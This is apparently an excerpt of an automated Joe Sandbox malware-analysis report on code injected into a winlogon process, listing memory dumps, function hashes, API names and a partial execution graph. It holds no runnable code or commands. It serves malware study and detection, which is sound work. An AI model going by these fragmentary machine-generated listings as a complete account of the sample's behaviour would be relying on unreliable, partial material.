                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction ID: 3eab4eabe3e4729d304bf9d7101085b2178bf51164354b22e681cff41496018d
                                                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction Fuzzy Hash: 2B510A2E20CFA161E625DEEEA45C3BA7B51F394B81F648065CE5B43B89DE39C444C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction ID: 3db6ac77bfa5ac9f272312f598324df14380f3bb2af56fd02340131b9c864c39
                                                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction Fuzzy Hash: 5951252E204FA0E2EA26CEBEA55C3AA6795F7C4B81F548925CE4943FC9DE3DC440C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction ID: e11b2a7f3edbef56172184a7c16dc2fd0d47df3306e2381dbbce4523e57785be
                                                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                          • Instruction Fuzzy Hash: 28515D3E2C4FA061E625DFBDA45C3AA6791F395B82F248025CD4DC3B99DE39CA40C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: 5d2149fe6c3e78c39011a294a18c6bd9ab588e09121204414753852e3327650c
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: 3C41F776625E90A6E710DFA9E44C79EB7A4F358785FA08121EE4D87798EB38C441CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: 5200b0a9beee72a8b1e71db727fb4ee46784548cd1607bea0f068cb2e68ac69f
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: 95410936625E90A6EB10CFA9E44C79AB7A4F748785F908122EE4D87798EF3CC441C741
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction ID: e0c351baf4859c10e77ba76a6590d0cc1abded0191d3b1c089e69e04578efc60
                                                          • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                          • Instruction Fuzzy Hash: 37411736725EA0A6E710DFA9E4487DAB7E1F358786F908121EE4D87758EF38C401CB40
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction ID: db6eb38841bde54c5dd188d0259e07b469649840c4da86e6cd179dda64078316
                                                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction Fuzzy Hash: 18113036218F5492EB218F19F44825977E5F788B95F588260DF8D07B58EF3CC551CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction ID: 7226e3522b5125ddb551aa3a57fb97c0fa8ea7e3dcbb6584f8f0b196ce66b00f
                                                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction Fuzzy Hash: EA113036214F5492EB218F19F44825977E5FB88B95F588624DF8D07B98EF3CC551CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction ID: fa1202d324cfbd0c8970eb7c3b42d5f78d3a1867e87e940416cdeefa60ff0339
                                                          • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                          • Instruction Fuzzy Hash: F1112E36214F5492EB61CB19F44825977E5F788B95F688220DF8D47B59EF3CC951CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction ID: ca64aea31b89ef05092247e0b654ff125d18e1aed59babf1c68cbec64ae6055e
                                                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction Fuzzy Hash: B6116D29A15F90A5EA14CBAAE80C25977F1F788FD1F688124DE4E53765EF38D442C300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction ID: ef720a90cd906b7f5869c837cfcecf23e1a7b74f588bf74dcced3a09afb9df82
                                                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction Fuzzy Hash: 8A118029A11F90A5EE14CBAAA80C25977F0FB88FD1F588125DE8E537A5EF38D442C700
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction ID: bccaa72d9641499ade5178cec18e2b7def748411dc5829a48323c92040d00650
                                                          • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                          • Instruction Fuzzy Hash: 30118429615F90E5EE15DBAAA40819977F1F788FD2F588124DE4E93765EF38D442C300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: 0deb5c519183e292ab043531c625829c76551796b07e63a5a63a9173b0e6b41d
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: 40E09A35A21A14AAE7288FA6D80C3493AE1FB8CF06F58C024C90907360FF7DC4D9CB81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: bf93436e8b06f2ff5ad44ff40c5e4fad4cbd51e911b6f2727cba50eb4f4d7872
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: 9FE06D35641A14AAF714CFA6D80C34936E1FF88F06F44C024C98907390EF7D8499C742
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction ID: 0a1c56e25ee5db3eb0535300d2575e74568581a8c9c731ae2c8e461e2ccff497
                                                          • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                          • Instruction Fuzzy Hash: B7E06535A11A14AAE7288FA6D80C38936E2FB98F07F48C024C90D07360EF7D8499CB81
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2288484714.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                          • Associated: 00000009.00000002.2287473946.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2289644934.00000225DC655000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2290739430.00000225DC660000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2291868866.00000225DC662000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2292943849.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc640000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: 4e31467a791c9597f993cc1cc15cf2794c9e3848138c65830c0539e2b7d329e9
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: BDE01A75621A14ABE7289FA6DC0C3597AE1FB8CF16F98C024C90907320FE3CD499DB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295170211.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                          • Associated: 00000009.00000002.2294050318.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2296553686.00000225DC685000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2297617513.00000225DC690000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2298802898.00000225DC692000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2299955606.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc670000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: 23fe0bf58cde12441d7855fc1d5244312edb8ab1c4b39374223f342a299c4fd6
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: 2AE0E575651A14AAF728DBA6D80825976A1FF88F16F88C024C949073A0FE388499DB12
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2302151534.00000225DC6A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                          • Associated: 00000009.00000002.2301041891.00000225DC6A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2303365598.00000225DC6B5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2304535009.00000225DC6C0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2305591866.00000225DC6C2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000009.00000002.2306755785.00000225DC6C9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_225dc6a0000_winlogon.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction ID: 4c756b871459276bfd73525a54b91d6da620adeb0992020cc646d42d4f2ae7cf
                                                          • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                          • Instruction Fuzzy Hash: CDE01A75621A14ABE7299FA6DC0839976E2FB9CF17F88C024C90D07320FE3C8499DB11

                                                          Execution Graph

                                                          Execution Coverage:1.9%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:1463
                                                          Total number of Limit Nodes:17
                                                          execution_graph 8516 202c0ae2ff0 8517 202c0ae3061 8516->8517 8518 202c0ae3384 8517->8518 8519 202c0ae308d GetModuleHandleA 8517->8519 8520 202c0ae30b1 8519->8520 8521 202c0ae309f GetProcAddress 8519->8521 8520->8518 8522 202c0ae30d8 StrCmpNIW 8520->8522 8521->8520 8522->8518 8528 202c0ae30fd 8522->8528 8523 202c0ae1a30 6 API calls 8523->8528 8524 202c0ae320f lstrlenW 8524->8528 8525 202c0ae32b9 lstrlenW 8525->8528 8526 202c0ae1cfc StrCmpIW StrCmpW 8526->8528 8527 202c0ae3f88 StrCmpNIW 8527->8528 8528->8518 8528->8523 8528->8524 8528->8525 8528->8526 8528->8527 7709 202c0aef870 7710 202c0aef8a0 7709->7710 7712 202c0aef8c7 7709->7712 7711 202c0aecb10 __std_exception_copy 13 API calls 7710->7711 7710->7712 7715 202c0aef8b4 7710->7715 7711->7715 7713 202c0aef99c 7712->7713 7735 202c0aec558 EnterCriticalSection 7712->7735 7716 202c0aef9ca 7713->7716 7717 202c0aefab3 7713->7717 7730 202c0aefa03 7713->7730 7715->7712 7718 202c0aef949 7715->7718 7726 202c0aef904 7715->7726 7716->7730 7736 202c0aecab0 7716->7736 7723 202c0aefac0 7717->7723 7745 202c0aec5ac LeaveCriticalSection 7717->7745 7719 202c0aed1f4 __std_exception_copy 13 API calls 7718->7719 7722 202c0aef94e 7719->7722 7732 202c0aed04c 7722->7732 7727 202c0aef9f3 7729 202c0aecab0 _invalid_parameter_noinfo 14 API calls 7727->7729 7728 202c0aefa61 7731 202c0aecab0 14 API calls _invalid_parameter_noinfo 7728->7731 7729->7730 7730->7728 7744 202c0aec5ac LeaveCriticalSection 7730->7744 7731->7728 7746 202c0aecef8 7732->7746 7737 202c0aecb10 __std_exception_copy 13 API calls 7736->7737 7738 202c0aecab9 7737->7738 7739 202c0aecabe 7738->7739 7740 202c0aecae8 FlsGetValue 7738->7740 7742 202c0aecae4 7738->7742 7739->7727 7740->7742 7741 202c0aecafe 7741->7727 7742->7741 7743 202c0aec940 _invalid_parameter_noinfo 13 API calls 7742->7743 7743->7741 7747 202c0aecf23 7746->7747 7754 202c0aecf94 7747->7754 7749 202c0aecf4a 7753 202c0aecf6d 7749->7753 7764 202c0aec3e0 7749->7764 7750 202c0aecf82 7750->7726 7752 202c0aec3e0 _invalid_parameter_noinfo 17 API calls 7752->7750 7753->7750 7753->7752 7777 202c0aeccc8 7754->7777 7759 202c0aecfcf 7759->7749 7765 202c0aec3ef GetLastError 7764->7765 7766 202c0aec438 7764->7766 7767 202c0aec404 7765->7767 7766->7753 7768 202c0aecba0 _invalid_parameter_noinfo 14 API calls 7767->7768 7769 202c0aec41e SetLastError 7768->7769 7769->7766 7770 202c0aec441 7769->7770 7771 202c0aec3e0 _invalid_parameter_noinfo 15 API calls 7770->7771 7772 202c0aec467 7771->7772 7817 202c0aeffe8 7772->7817 7778 202c0aecd1f 7777->7778 7779 202c0aecce4 GetLastError 7777->7779 7778->7759 7783 202c0aecd34 7778->7783 7780 202c0aeccf4 7779->7780 7790 202c0aecba0 7780->7790 7784 202c0aecd50 GetLastError SetLastError 7783->7784 7785 202c0aecd68 7783->7785 7784->7785 7785->7759 7786 202c0aed06c IsProcessorFeaturePresent 7785->7786 7787 202c0aed07f 7786->7787 7795 202c0aecd80 7787->7795 7791 202c0aecbc8 FlsGetValue 7790->7791 7792 202c0aecbc4 7790->7792 7791->7792 7793 202c0aecbde SetLastError 7792->7793 7794 202c0aec940 _invalid_parameter_noinfo 13 API calls 7792->7794 7793->7778 7794->7793 7796 202c0aecdba 